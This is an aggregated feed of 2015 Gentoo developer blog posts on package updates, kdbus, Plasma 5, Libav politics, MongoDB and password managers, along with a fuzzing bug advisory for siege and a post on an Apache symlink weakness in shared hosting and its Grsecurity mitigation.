Commit fix:;a=commitdiff;h=0a49a62f998747cfa564d98d36a459fe70d3299b;hp=6f4cd33efb5a9ec75db1677d5f7846c60337129f

This bug was discovered by Agostino Sarubbo of Gentoo.


2015-06-21: bug discovered
2015-06-22: bug reported privately to upstream
2015-06-30: upstream commit the fix
2015-07-14: CVE assigned
2015-07-16: advisory release

This bug was found with American Fuzzy Lop.
This bug does not affect ffmpeg.


July 14, 2015
siege: off-by-one in load_conf() (July 14, 2015, 19:04 UTC)

Siege is an http load testing and benchmarking utility.

During the test of a webserver, I hit a segmentation fault. I recompiled siege with ASan and it clearly show an off-by-one in load_conf(). The issue is reproducible without passing any arguments to the binary.
The complete output:

ago@willoughby ~ # siege
==488==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000d7f1 at pc 0x00000051ab64 bp 0x7ffcc3d19a70 sp 0x7ffcc3d19a68
READ of size 1 at 0x60200000d7f1 thread T0
#0 0x51ab63 in load_conf /var/tmp/portage/app-benchmarks/siege-3.1.0/work/siege-3.1.0/src/init.c:263:12
#1 0x515486 in init_config /var/tmp/portage/app-benchmarks/siege-3.1.0/work/siege-3.1.0/src/init.c:96:7
#2 0x5217b9 in main /var/tmp/portage/app-benchmarks/siege-3.1.0/work/siege-3.1.0/src/main.c:324:7
#3 0x7fb2b1b93aa4 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.20-r2/work/glibc-2.20/csu/libc-start.c:289
#4 0x439426 in _start (/usr/bin/siege+0x439426)

0x60200000d7f1 is located 0 bytes to the right of 1-byte region [0x60200000d7f0,0x60200000d7f1)
allocated by thread T0 here:
#0 0x4c03e2 in __interceptor_malloc /var/tmp/portage/sys-devel/llvm-3.6.1/work/llvm-3.6.1.src/projects/compiler-rt/lib/asan/
#1 0x7fb2b1bf31e9 in __strdup /var/tmp/portage/sys-libs/glibc-2.20-r2/work/glibc-2.20/string/strdup.c:42

SUMMARY: AddressSanitizer: heap-buffer-overflow /var/tmp/portage/app-benchmarks/siege-3.1.0/work/siege-3.1.0/src/init.c:263 load_conf
Shadow bytes around the buggy address:
0x0c047fff9aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9ad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9ae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9af0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa[01]fa
0x0c047fff9b00: fa fa 03 fa fa fa fd fd fa fa fd fa fa fa fd fd
0x0c047fff9b10: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd
0x0c047fff9b20: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9b30: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fa
0x0c047fff9b40: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb

Affected version:
3.1.0 (and maybe past versions).

Fixed version:
Not available.

Commit fix:
Not available.

This bug was discovered by Agostino Sarubbo of Gentoo.

Not really qualifiable, is more a programming bug.

2015-06-09: bug discovered
2015-06-10: bug reported privately to upstream
2015-07-13: no upstream response
2015-07-14: advisory release


July 10, 2015
Johannes Huber a.k.a. johu (homepage, bugs)
Plasma 5 and kdbus testing (July 10, 2015, 22:03 UTC)

Thanks to Mike Pagano who enabled kdbus support in Gentoo kernel sources almost 2 weeks ago. Which gives us the choice to test it. As described in Mikes blog post you will need to enable the use flags kdbus and experimental on sys-kernel/gentoo-sources and kdbus on sys-apps/systemd.

root # echo "sys-kernel/gentoo-sources kdbus experimental" >> /etc/portage/package.use/kdbus

If you are running >=sys-apps/systemd-221 kdbus is already enabled by default otherwise you have to enable it.

root # echo "sys-apps/systemd kdbus" >> /etc/portage/package.use/kdbus

Any packages affected by the change need to be rebuilt.

root # emerge -avuND @world

Enable kdbus option in kernel.

General setup --->
<*> kdbus interprocess communication

Build the kernel, install it and reboot. Now we can check if kdbus is enabled properly. systemd should automatically mask dbus.service and start systemd-bus-proxyd.service instead (Thanks to eliasp for the info).

root # systemctl status dbus
● dbus.service
Loaded: masked (/dev/null)
Active: inactive (dead)

root # systemctl status systemd-bus-proxyd
● systemd-bus-proxyd.service - Legacy D-Bus Protocol Compatibility Daemon
Loaded: loaded (/usr/lib64/systemd/system/systemd-bus-proxyd.service; static; vendor preset: enabled)
Active: active (running) since Fr 2015-07-10 22:42:16 CEST; 16min ago
Main PID: 317 (systemd-bus-pro)
CGroup: /system.slice/systemd-bus-proxyd.service
└─317 /usr/lib/systemd/systemd-bus-proxyd --address=kernel:path=/sys/fs/kdbus/0-system/bus

Plasma 5 starts fine here using sddm as login manager. On Plasma 4 you may be interested in Bug #553460.

Looking forward when Plasma 5 will get user session support.

Have fun!

Nathan Zachary a.k.a. nathanzachary (homepage, bugs)


My tech articles—especially Linux ones—are some of the most-viewed on The Z-Issue. If this one has helped you, please consider a small donation to The Parker Fund by using the top widget at the right. Thanks!

For quite some time, I have tried to get links in Thunderbird to open automatically in Chrome or Chromium instead of defaulting to Firefox. Moreover, I have Chromium start in incognito mode by default, and I would like those links to do the same. This has been a problem for me since I don’t use a full desktop environment like KDE, GNOME, or even XFCE. As I’m really a minimalist, I only have my window manager (which is Openbox), and the applications that I use on a regular basis.

One thing I found, though, is that by using PCManFM as my file manager, I do have a few other related applications and utilities that help me customise my workspace and workflows. One such application is libfm-pref-apps, which allows for setting preferred applications. I found that I could do just what I wanted to do without mucking around with manually setting MIME types, writing custom hooks for Thunderbird, or any of that other mess.

Here’s how it was done:

  1. Execute /usr/bin/libfm-pref-apps from your terminal emulator of choice
  2. Under “Web Browser,” select “Customise” from the drop-down menu
  3. Select the “Custom Command Line” tab
  4. In the “Command line to execute” box, type /usr/bin/chromium --incognito --start-maximized %U
  5. In the “Application name” box, type “Chromium incognito” (or however else you would like to identify the application)

Voilà! After restarting Thunderbird, my links opened just like I wanted them to. The only modification that you might need to make is the “Command line to execute” portion. If you use the binary of Chrome instead of building the open-source Chromium browser, you would need to change it to the appropriate executable (and the path may be different for you, depending on your system and distribution). Also, in the command line that I have above, here are some notes about the switches used:

  • –incognito starts Chromium in incognito mode by default (that one should be obvious)
  • –start-maximized makes the browser window open in the full size of your screen
  • %U allows Chromium to accept a URL or list of URLs, and thus, opens the link that you clicked in Thunderbird

Under the hood, it seems like libfm-pref-apps is adding some associations in the ~/.config/mimeapps.list file. The relevant lines that I found were:

[Added Associations]
x-scheme-handler/http=userapp-chromium --incognito --start-maximized-8KZNYX.desktop;
x-scheme-handler/https=userapp-chromium --incognito --start-maximized-8KZNYX.desktop;

Hope this information helps you get your links to open in your browser of choice (and with the command-line arguments that you want)!


July 09, 2015
Luca Barbato a.k.a. lu_zero (homepage, bugs)
My fun starts now (July 09, 2015, 08:35 UTC)

Debian decided to move to the new FFmpeg, what does it mean to me? Why should I care? This post won’t be technical for once, if you think “Libav is evil” start reading from here.

Relationship between Libav and Debian

After split between what was FFmpeg in two projects, with Michael Niedermayer keeping the name due his ties with the legal owner of the trademark and “merging” everything the group of 18 people was doing under the new Libav name.

For Gentoo I, maybe naively, decided to just have both and let whoever want maintain the other package. Gentoo is about choice and whoever wants to shot himself on a foot has to be be free to do that in the safest possible way.

For Debian, being binary packaged, who was maintaining the package decided to stay with Libav. It wasn’t surprising given “lack of releases” was one of the sore points of the former FFmpeg and he started to get involved with upstream to try to fix it.

Perceived Leverage and Real Shackles

Libav started with the idea to fix everything that went wrong with the Former FFmpeg:
– Consensus instead of idolatry for THE Leader
– Paced releases instead of cvs is always a release
– Maintained releases branches for years
git instead of svn
– Cleaner code instead of quick hacks to solve the problem of the second
– Helping downstreams instead of giving them the finger.

Being in Debian, according to some people was undeserved because “Libav is evil” and since we wrongly though that people would look at actions and not at random blogpost by people with more bias than anything we just kept writing code. It was a huge mistake, this blogpost and this previous are my try to address this.

Being in Debian to me meant that I had to help fixing stale version of software, often even without upstream.

The people at Debian instead of helping, the amount of patches coming from people over the years amounted to 1 according to git, kept piling up work on us.

Fun requests such as “Do remove a standard test image because its origin according to them is unclear” or “Do maintain the ancient release branch that is 3 major releases behind” had been quite common.

For me Debian had been no help and additional bourden.

The leverage that being in a distribution theoretically gives according to those crying because the evil Libav was in Debian amounts to none to me: their user complain because the version provided is stale, their developers do not help even keeping the point releases up or updating the software using Libav because scared to be tainted, downstreams such as Kubi (that are so naive to praise FFmpeg for what happened in Libav, such as the HEVC multi-thread support Anton wrote) would keep picking the implementation they prefer and use ffmpeg-only API whenever they could (debian will ask us to fix that for them anyway).

Is important being in Debian?

Last time they were discussing moving to FFmpeg I had the unpleasant experience of reading lots of lovely email with passive-aggressive snide remarks such as “libav has just developers not users” or seeing the fruits of the smear campaign such as “is it true you stole the FFmpeg hardware” in their mailing list (btw during the past VDD the FFmpeg people there said at least that would be addressed, well, it had not been yet, thank you).

At that time I got asked to present Libav, this time after reading in the debian wiki the “case” presented with skewed git statistics (maybe purge the merge commits when you count them to compare a project activity?) and other number dressing I just got sick of it.

Personally I do not care. There is a better way to spend your own free time than do the distro maintenance work for people that not even thanks you (because you are evil).

The smear campaign pays

I’m sure that now that now that the new FFmpeg gets to replace Libav will get more contributions from people and maybe those that were crying for the “oh so unjust” treatment would be happy to do the maintenance churn.

Anyway that’s not my problem anymore and I guess I can spend more time writing about the “social issues” around the project trying to defuse at least a little the so effective “Libav is evil” narrative a post a time.

Alexys Jacob a.k.a. ultrabug (homepage, bugs)

In our previous attempt to upgrade our production cluster to 3.0, we had to roll back from the WiredTiger engine on primary servers.

Since then, we switched back our whole cluster to 3.0 MMAPv1 which has brought us some better performances than 2.6 with no instability.

Production checklist

We decided to use this increase in performance to allow us some time to fulfil the entire production checklist from MongoDB, especially the migration to XFS. We’re slowly upgrading our servers kernels and resynchronising our data set after migrating from ext4 to XFS.

Ironically, the strong recommendation of XFS in the production checklist appeared 3 days after our failed attempt at WiredTiger… This is frustrating but gives some kind of hope.

I’ll keep on posting on our next steps and results.

Our hero WiredTiger Replica Set

While we were battling with our production cluster, we got a spontaneous major increase in the daily volumes from another platform which was running on a single Replica Set. This application is write intensive and very disk I/O bound. We were killing the disk I/O with almost a continuous 100% usage on the disk write queue.

Despite our frustration with WiredTiger so far, we decided to give it a chance considering that this time we were talking about a single Replica Set. We were very happy to see WiredTiger keep up to its promises with an almost shocking serenity.

Disk I/O went down dramatically, almost as if nothing was happening any more. Compression did magic on our disk usage and our application went Roarrr !

July 06, 2015
Zack Medico a.k.a. zmedico (homepage, bugs)

I’ve created a utility called tardelta (ebuild available) that people using containers may be interested in. Here’s the README:

It is possible to optimize docker containers such that multiple containers are based off of a single copy of a common base image. If containers are constructed from tarballs, then it can be useful to create a delta tarball which contains the differences between a base image and a derived image. The delta tarball can then be layered on top of the base image using a Dockerfile like the following:

FROM base
ADD delta.tar.xz /

Many different types of containers can thus be derived from a common base image, while sharing a single copy of the base image. This saves disk space, and can also reduce memory consumption since it avoids having duplicate copies of base image data in the kernel’s buffer cache.

July 03, 2015
Luca Barbato a.k.a. lu_zero (homepage, bugs)
Summer Sprint in Stockholm (July 03, 2015, 19:44 UTC)

Last weekend some libav developers met in the South Pole offices with additional sponsorship from Inteno Broadband Technology. (And the people at Borgodoro that gave us more chocolate to share with everybody).


Since last year the libav started to have sprints to meet up, discuss in person topics that require a more direct media than IRC or Mailing List and usually write some code asking for direct opinions and help.

Who attended

Benjamin was our host for the event. Andreas joined us for the first day only, while Anton, Vittorio, Kostya, Janne, Jan and Rémi stayed both days.

What we did

The focus had been split in a number of area of interests:

  • API: with some interesting discussion between Rémi and Anton regarding on how to clarify a tricky detail regarding AVCodecContext and AVFrame and who to trust when.
  • Reverse Engineering: With Vittorio and Kostya having fun unraveling codecs one after the other (I think they got 3 working)
  • Release 12 API and ABI break
    • What to remove and what to keep further
    • What to change so it is simpler to use
    • If there is enough time to add the decoupled API for avcodec
  • Release 12 wishlist:
    • HEVC speed improvements, since even the C code can be sped up.
    • HEVC extended range support, since there is YUV 422 content out now.
    • More optimizations for the newer architectures (aarch64 and power64le)
    • More hardware accelerator support (e.g. HEVC encoding and decoding support for Intel MediaSDK).
    • Some more filters, since enough people asked for them.
    • Merge some of the pending work (e.g. go2meeting3, the new asf demuxer).
    • Get more security fixes in (with ago kindly helping me on this).
    • … and more …
  • New website with markdown support to make easier for people to update.

During the sprint we managed to write a lot of code and even to push some during the sprint.
Maybe a little too early in the case of asf, but better have it in and get to fix it for the release.

Special mention to Jan for getting a quite exotic container almost ready, I’m looking forward to see it in the ml; and Andreas for reminding me that AVScale is needed sorely by sending me a patch that fixes a problem his PowerPC users are experiencing while uncovering some strange problem in swscale… I’ll need to figure out a good way to get a PowerPC big-endian running to look at it in detail.

Thank you

I want to especially thank all the people at South Pole that welcome me when I arrived with 1 day in advance and all the people that participated and made the event possible, had been fun!

Post Scriptum

  • This post had been delayed 1 week since I had been horribly busy, sorry for the delay =)
  • During the sprint legends such as kropping the sourdough monster and the burning teapot had been created, some reference of them will probably appear in commits and code.
  • Anybody with experience with qemu-user for PowerPC is welcome to share his knowledge with me.

Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
KDEPIM without Akonadi (July 03, 2015, 14:16 UTC)

As you know, Gentoo is all about flexibility. You can run bleeding edge code (portage, our package manager, even provides you with installation from git master KF5 and friends) or you can focus on stability and trusted code. This is why we've been offering our users for the last years KDEPIM (the version where KMail e-mail storage was not integrated with Akonadi yet, also known as KMail1) as a drop-in replacement for the newer versions.
Recently the Nepomuk search framework has been replaced by Baloo, and after some discussion we decided that for the Nepomuk-related packages it's now time to go. Problem is, the old KDEPIM packages still depend on it via their Akonadi version. This is why - for those of our users who prefer to run KDEPIM 4.4 / KMail1 - we've decided to switch to Pali Rohár's kdepim-noakonadi fork (see also his 2013 blog post and the code).The packages are right now in the KDE overlay, but will move to the main tree after a few days of testing and be treated as an update of KDEPIM
The fork is essentially KDEPIM 4.4 including some additional bugfixes from the KDE/4.4 git branch, with KAddressbook patched back to KDEPIM 4.3 state and references to Akonadi removed elsewhere. This is in some ways a functionality regression since the integration of e.g. different calendar types is lost, however in that version it never really worked perfectly anyway.

For now, you will still need the akonadi-server package, since kdepimlibs (outside kdepim and now at version 4.14.9) requires it to build, but you'll never need to start the Akonadi server. As a consequence, Nepomuk support can be disabled everywhere, and the Nepomuk core and client and Akonadi client packages can be removed by the package manager (--depclean, make sure to first globally disable the nepomuk useflag and rebuild accordingly).

You might ask "Why are you still doing this?"... well. I've been told Akonadi and Baloo is working very nicely, and again I've considered upgrading all my installations... but then on my work desktop where I am using newest and greatest KDE4PIM bug 338658 pops up regularly and stops syncing of important folders. I just don't have the time to pointlessly dig deep into the Akonadi database every few days. So KMail1 it is, and I'll rather spend some time occasionally picking and backporting bugfixes.

June 28, 2015
Luca Barbato a.k.a. lu_zero (homepage, bugs)
broken-endian (June 28, 2015, 20:44 UTC)

You wrote your code, you wrote the tests and everything seems working.

Then you got somebody running your code on a big-endian machine and reports that EVERYTHING is broken.

Usually most of the data is serialized to disk or wire as big-endian, most of cpu usually do the computation in little-endian (with MIPS and PowerPC as rare exception). If you assume the relationship between the data on-wire and data in the cpu registers is always the same you are bound to have problems (and it gets even worse if you decide to write the data down as little-endian to disk because swapping from cpu to disk feels slow, you are doing it wrong).


The problem is mainly while reading or writing:

  • Sometimes feels simpler to copy over some packed structure using the equivalent of read(fd, &amp;my_struct, sizeof(struct)). if the struct contains anything different from byte-sized variables it won’t work, so is safe to say it won’t work at all. Gets even worse if you forgot to mark the structure as packed.
  • Writing has the same issue, never try to directly write a structure or even 16bit integers w/out making sure you get the expected endianess right.

Mini-post written to recall what not to do (more examples later).

June 27, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
LastPass got hacked, I'm still okay with it (June 27, 2015, 13:23 UTC)

So LastPass was compromised and so they report. I'm sure there are plenty of smug geeks out there, happy about users being compromised. I thought that this is the right time to remind people why I'm a LastPass user and will stay a LastPass user even after this.

The first part is a matter of trust in the technology. If I did not trust LastPass enough to not have easy access to the decrypted content, I wouldn't be using it to begin with. Since I do not trust the LastPass operators, even in the case the encrypted vault were compromised (and they say they weren't), I wouldn't be worrying too much.

On the other hand I followed the obvious course of not only changing the master password, and change the important passwords just to be paranoid. This is actually one good side of LastPass — changing the passwords that are really important is very easy as they instrument the browser, so Facebook, Twitter, Amazon, PayPal, … are one click away from a new, strong password.

Once again, the main reason why I suggest tools such as LastPass (and I like LastPass, but that's just preference) is that they are easy to use, and easy to use means people will use them. Making tools that are perfectly secure in theory but very hard to use just means people will not use them, full stop. A client-side certificate is much more secure than a password, but at the same time procuring one and using it properly is non-trivial so in my experience only a handful of services use that — I know of a couple of banks in Italy, and of course StartSSL and similar providers.

The problem with offline services is that, for the most part, don't allow good access while from phones, for instance. So you end up choosing, for things you use often from the phone, memorable passwords. But memorable passwords are usually fairly easy to crack, unless you use known methods and long password — although at least it's not the case, like I read on Arse^H recently, that since we know the md5 hash for "mom", any password with that string anywhere is weakened.

Let's take an example away from the password vaults. In Ireland (and I assume UK simply because the local systems are essentially the same in many aspects), banks have this bollocks idea that is more secure to ask for some of the characters of a password rather than a full password. I think this is a remnant of old bank teller protocols, as I remember reading about that in The Art of Deception (good read, by the way.)

While in theory picking a random part of the password means a phishing attempt would never get the full password, and thus won't be able to access the bank's website unless they are very lucky and get exactly the same three indexes over and over, it is a frustrating experience.

My first bank, AIB, used a five-digits PIN, and then select three digits out of it when I log in, which is not really too difficult to memorize. On the other hand, on their mobile app they decided that the right way to enter the numbers is by using drop-down boxes (sigh.) My current bank, Ulster Bank/RBS, uses a four digits pin, plus a variable length password, which I generated through LastPass as 20 characters, before realizing how bad that is, because it means I now get asked three random digits off the four... and three random characters of the 20.

Let that sink in a moment: they'll ask me for the second, fifth and sixteenth character of a twenty characters randomly generated password. So no auto-fill, no copy-paste, no password management software assisted login. Of course most people here would just not bother and go with a simple password they can remember. Probably made of multiple words of the same length (four letters? five?) so that it becomes easy to count which one is the first character of the fourth word (sixteenth character of the password.) Is it any more secure?

I think I'll write a separate blog post about banks apps and website security mis-practices because it's going to be a long topic and one I want to write down properly so I can forward it to my bank contacts, even though it won't help with anything.

Once again, my opinion is that any time you make security a complicated feature, you're actually worsening the practical security, even if your ideas are supposed to improve the theoretical one. And that includes insisting on the perfect solution for password storage.

June 26, 2015
Mike Pagano a.k.a. mpagano (homepage, bugs)
kdbus in gentoo-sources (June 26, 2015, 23:35 UTC)


Keeping with the theme of ‘Gentoo is about choice” I’ve added the ability for users to include kdbus into their gentoo-sources kernel.  I wanted an easy way for gentoo users to test the patchset while maintaining the default installation of not having it at all.

In order to include the patchset on your gentoo-sources you’ll need the following:

1. A kernel version >= 4.1.0-r1

2. the ‘experimental’ use flag

3. the ‘kdbus’ use flag

I am not a systemd user, but from the ebuild it looks like if you build systemd with the ‘kdbus’ use flag it will use it.

Please send all kdbus bugs upstream by emailing the developers and including in the CC .

Read as much as you can about kdbus before you decided to build it into your kernel.  There have been security concerns mentioned (warranted or not), so following the upstream patch review at would probably be prudent.

When a new version is released, wait a week before opening a bug.  Unless I am on vacation, I will most likely have it included before the week is out. Thanks!

NOTE: This is not some kind of Gentoo endorsement of kdbus.  Nor is it a Mike Pagano endorsement of kdbus.  This is no different then some of the other optional and experimental patches we carry.  I do all the genpatches work which includes the patches, the ebuilds and the bugs therefore since I don’t mind the extra work of keeping this up to date, then I can’t see any reason not to include it as an option.



June 25, 2015
Johannes Huber a.k.a. johu (homepage, bugs)
KDE Plasma 5.3.1 testing (June 25, 2015, 23:15 UTC)

After several month of packaging in kde overlay and almost a month in tree, we have lifted the mask for KDE Plasma 5.3.1 today. If you want to test it out, now some infos how to get it.

For easy transition we provide two new profiles, one for OpenRC and the other for systemd.

root # eselect profile list
[8] default/linux/amd64/13.0/desktop/plasma
[9] default/linux/amd64/13.0/desktop/plasma/systemd

Following example activates the Plasma systemd profile:

root # eselect profile set 9

On stable systems you need to unmask the qt5 use flag:

root # echo "-qt5" >> /etc/portage/profile/use.stable.mask

Any packages affected by the profile change need to be rebuilt:

root # emerge -avuND @world

For stable users, you also need to keyword the required packages. You can let portage handle it with autokeyword feature or just grep the keyword files for KDE Frameworks 5.11 and KDE Plasma 5.3.1 from kde overlay.

Now just install it (this is full Plasma 5, the basic desktop would be kde-plasma/plasma-desktop):

root # emerge -av kde-plasma/plasma-meta

KDM is not supported for Plasma 5 anymore, so if you have installed it kill it with fire. Possible and tested login managers are SDDM and LightDM.

For detailed instructions read the full upgrade guide. Package bugs can be filed to and about the software to

Have fun,
the Gentoo KDE Team

June 23, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)

tl;dr Most servers running a multi-user webhosting setup with Apache HTTPD probably have a security problem. Unless you're using Grsecurity there is no easy fix.

I am part of a small webhosting business that I run as a side project since quite a while. We offer customers user accounts on our servers running Gentoo Linux and webspace with the typical Apache/PHP/MySQL combination. We recently became aware of a security problem regarding Symlinks. I wanted to share this, because I was appalled by the fact that there was no obvious solution.

Apache has an option FollowSymLinks which basically does what it says. If a symlink in a webroot is accessed the webserver will follow it. In a multi-user setup this is a security problem. Here's why: If I know that another user on the same system is running a typical web application - let's say Wordpress - I can create a symlink to his config file (for Wordpress that's wp-config.php). I can't see this file with my own user account. But the webserver can see it, so I can access it with the browser over my own webpage. As I'm usually allowed to disable PHP I'm able to prevent the server from interpreting the file, so I can read the other user's database credentials. The webserver needs to be able to see all files, therefore this works. While PHP and CGI scripts usually run with user's rights (at least if the server is properly configured) the files are still read by the webserver. For this to work I need to guess the path and name of the file I want to read, but that's often trivial. In our case we have default paths in the form /home/[username]/websites/[hostname]/htdocs where webpages are located.

So the obvious solution one might think about is to disable the FollowSymLinks option and forbid users to set it themselves. However symlinks in web applications are pretty common and many will break if you do that. It's not feasible for a common webhosting server.

Apache supports another Option called SymLinksIfOwnerMatch. It's also pretty self-explanatory, it will only follow symlinks if they belong to the same user. That sounds like it solves our problem. However there are two catches: First of all the Apache documentation itself says that "this option should not be considered a security restriction". It is still vulnerable to race conditions.

But even leaving the race condition aside it doesn't really work. Web applications using symlinks will usually try to set FollowSymLinks in their .htaccess file. An example is Drupal which by default comes with such an .htaccess file. If you forbid users to set FollowSymLinks then the option won't be just ignored, the whole webpage won't run and will just return an error 500. What you could do is changing the FollowSymLinks option in the .htaccess manually to SymlinksIfOwnerMatch. While this may be feasible in some cases, if you consider that you have a lot of users you don't want to explain to all of them that in case they want to install some common web application they have to manually edit some file they don't understand. (There's a bug report for Drupal asking to change FollowSymLinks to SymlinksIfOwnerMatch, but it's been ignored since several years.)

So using SymLinksIfOwnerMatch is neither secure nor really feasible. The documentation for Cpanel discusses several possible solutions. The recommended solutions require proprietary modules. None of the proposed fixes work with a plain Apache setup, which I think is a pretty dismal situation. The most common web server has a severe security weakness in a very common situation and no usable solution for it.

The one solution that we chose is a feature of Grsecurity. Grsecurity is a Linux kernel patch that greatly enhances security and we've been very happy with it in the past. There are a lot of reasons to use this patch, I'm often impressed that local root exploits very often don't work on a Grsecurity system.

Grsecurity has an option like SymlinksIfOwnerMatch (CONFIG_GRKERNSEC_SYMLINKOWN) that operates on the kernel level. You can define a certain user group (which in our case is the "apache" group) for which this option will be enabled. For us this was the best solution, as it required very little change.

I haven't checked this, but I'm pretty sure that we were not alone with this problem. I'd guess that a lot of shared web hosting companies are vulnerable to this problem.

Here's the German blog post on our webpage and here's the original blogpost from an administrator at Uberspace (also German) which made us aware of this issue.

June 21, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Perl 5.22 testers needed! (June 21, 2015, 08:14 UTC)

Gentoo users rejoice, for a few days already we have Perl 5.22.0 packaged in the main tree. Since we don't know yet how much stuff will break because of the update, it is masked for now. Which means, we need daring testers (preferably running ~arch systems, stable is also fine but may need more work on your part to get things running) who unmask the new Perl, upgrade, and file bugs if needed!!!
Here's what you need in /etc/portage/package.unmask (and possibly package.accept_keywords) to get started (download); please always use the full block, since partial unmasking will lead to chaos. We're looking forward to your feedback!
# Perl 5.22.0 mask / unmask block

# end of the Perl 5.22.0 mask / unmask block
After the update, first run
emerge --depclean --ask
and afterwards
perl-cleaner --all
perl-cleaner should not need to do anything, ideally. If you have depcleaned first and it still wants to rebuild something, that's a bug. Please file a bug report for the package that is getting rebuilt (but check our wiki page on known Perl 5.22 issues first to avoid duplicates).